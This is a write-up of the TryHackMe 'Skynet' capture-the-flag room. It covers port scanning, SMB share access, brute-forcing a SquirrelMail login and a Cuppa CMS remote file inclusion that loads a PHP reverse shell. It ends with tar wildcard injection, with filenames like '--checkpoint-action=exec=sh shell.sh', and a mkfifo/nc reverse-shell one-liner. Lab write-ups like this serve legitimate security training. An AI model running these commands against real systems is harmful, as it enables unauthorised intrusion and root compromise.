/ TRYHACKME, CTF, EASY

Skynet Write Up

skynet

Overview

Skynet is a easy rated CTF room on TryHackMe.

Are you able to compromise this Terminator themed machine?

Nmap

I deployed the machine and was given the target IP 10.10.120.207. I started a NMAP scan to check the available ports.

└──╼ $sudo nmap -sC -sV -oN nmap/initial 10.10.120.207
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 16:37 GMT
Nmap scan report for 10.10.120.207
Host is up (0.032s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE CAPA PIPELINING RESP-CODES UIDL SASL TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: Pre-login IMAP4rev1 ENABLE LOGINDISABLEDA0001 more LOGIN-REFERRALS have SASL-IR listed ID capabilities LITERAL+ post-login IDLE OK
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 3h27m50s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-01-24T10:37:29-06:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-01-24T16:37:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.79 seconds

6 Ports open:

  • 22 - SSH - Banner is showing its an Ubuntu machine
  • 80 - HTTP - Apache web server version 2.4.18
  • 110 - POP3 - Dovecot
  • 139/445 - Samba
  • 143 - IMAP - Dovecot

Enumeration

A few ports to review but I started with SMB because typically in CTF’s you can find anonymous access to share which provide hints or files required on other ports. Using smbmap I found one accessible share called anonymous.

└──╼ $smbmap -H 10.10.120.207
[+] Guest session       IP: 10.10.120.207:445   Name: 10.10.120.207                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

Using smbclient I was able to connect to the share and found a text file and a folder of logs files. I downloaded all the files to my machine.

└──╼ $smbclient //10.10.120.207/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 16:04:00 2020
  ..                                  D        0  Tue Sep 17 08:20:17 2019
  attention.txt                       N      163  Wed Sep 18 04:04:59 2019
  logs                                D        0  Wed Sep 18 05:42:16 2019

                9204224 blocks of size 1024. 5822640 blocks available
smb: \> get attention.txt 
getting file \attention.txt of size 163 as attention.txt (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 05:42:16 2019
  ..                                  D        0  Thu Nov 26 16:04:00 2020
  log2.txt                            N        0  Wed Sep 18 05:42:13 2019
  log1.txt                            N      471  Wed Sep 18 05:41:59 2019
  log3.txt                            N        0  Wed Sep 18 05:42:16 2019

                9204224 blocks of size 1024. 5819896 blocks available
smb: \logs\> mget *
Get file log2.txt? y
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 0.7 KiloBytes/sec)
Get file log1.txt? y
getting file \logs\log1.txt of size 471 as log1.txt (4.1 KiloBytes/sec) (average 1.8 KiloBytes/sec)
Get file log3.txt? y
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \logs\> 

The attention.txt file is a note:

“A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson”

However log1.txt looks to be a password list. log2 and log3 are empty. I moved on to start enumerating the website.

webpage

Nothing to note on the page or in the page source so I ran a gobuster.

┌─[daz@parrot]─[~/Documents/TryHackMe/Skynet]
└──╼ $gobuster dir -u http://10.10.120.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.120.207
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/24 16:38:47 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
/server-status (Status: 403)
===============================================================
2021/01/24 16:41:06 Finished
===============================================================

/squirrelmail brings to me to a login page.

squirrelmail

Using Burp intruder I was able to find the login details for Miles. I created a username file with the following entries:

  • miles
  • mdyson
  • milesdyson
  • milesd

Using this list of usernames and the passwords found in log1.txt I was able to access the email account.

emails

One of the emails is miles new SMB password.

“We have changed your smb password after system malfunction. Password: )s{A&2Z{REDACTED}”

Going back to smbclient I tried to connect to the SMB share milesdyson with the new password and got in.

└──╼ $smbclient //10.10.120.207/milesdyson -U milesdyson -p                                         
Enter WORKGROUP\milesdyson's password:                                                              
Try "help" to get a list of possible commands.                                                      
smb: \> ls                                                                                          
  .                                   D        0  Tue Sep 17 10:05:47 2019                          
  ..                                  D        0  Wed Sep 18 04:51:03 2019                          
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 10:05:14 2019                      
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 10:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 10:05:14 2019                   
  notes                               D        0  Tue Sep 17 10:18:40 2019                          
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 10:05:14 2019                   
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 10:05:14 2019           
                                                                                                    
                9204224 blocks of size 1024. 5810144 blocks available                               

Only really one file of interest /notes/important.txt

└──╼ $cat important.txt 

1. Add features to beta CMS /45kra2{REDACTED}
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

A new cms directory to probe, looking at the page it appears to be a blog page for Miles.

miles

Running gobuster again against the directory reveals a administrator page.

└──╼ $gobuster dir -u http://10.10.120.207/45kra2{REDACTED}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.120.207/45kra2{REDACTED}/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/24 16:48:27 Starting gobuster
===============================================================
/administrator (Status: 301)
===============================================================
2021/01/24 16:50:42 Finished
===============================================================

Initial Access

Going to http://10.10.120.207/45kra2{REDACTED}/administrator/ takes us to a login page for Cuppa CMS. A quick Google reveals the exploit which provides and local and remote file inclusion.

Looking at the exploit we can simply request a URL with our shell code location. We can use this to get a reverse shell payload from our machine and then execute.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?

On my machine I copied /usr/share/webshells/php/php-reverse-shell.php to my working directory and renamed it to shell.php, I updated the configuration to include my VPN IP and port 4444.

Then using python3 I started a http server to host the reverse shell payload and started a netcat listener on port 4444. In my browser I entered:

http://10.10.120.207/45kra2{REDACTED}/administrator/alerts/alertConfigField.php?urlConfig=http:///shell.php

└──╼ $sudo python3 -m http.server 80                                      
                                                                          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...                  
10.10.120.207 - - [24/Jan/2021 16:57:15] "GET /shell.php HTTP/1.0" 200 -  

On my netcat listener I get a response and got a shell as ‘www-data’.

└──╼ $nc -nvlp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [10.10.120.207] 59292
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 10:57:15 up 22 min,  0 users,  load average: 0.00, 0.04, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$   

Priv Esc

Looking at the file system there are two files backup.sh and backup.tgz both owned by root.

drwxr-xr-x 2 root       root       4.0K Sep 17  2019 .
drwxr-xr-x 5 milesdyson milesdyson 4.0K Sep 17  2019 ..
-rwxr-xr-x 1 root       root         74 Sep 17  2019 backup.sh
-rw-r--r-- 1 root       root       4.5M Jan 24 10:59 backup.tgz

The script is really simple, just creating a backup tar file or /var/www/html.

$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

However because the tar command is using * which is a wild card and it appears the script is being run by root as a cron job we can exploit this to get a reverse shell. This article explains it in detail.

I following the same steps in the article and set my port to 5555 as already have a shell on port 4444.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc  5555 >/tmp/f" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"

Now just wait for a minute and we now have a root shell!

Thanks for reading!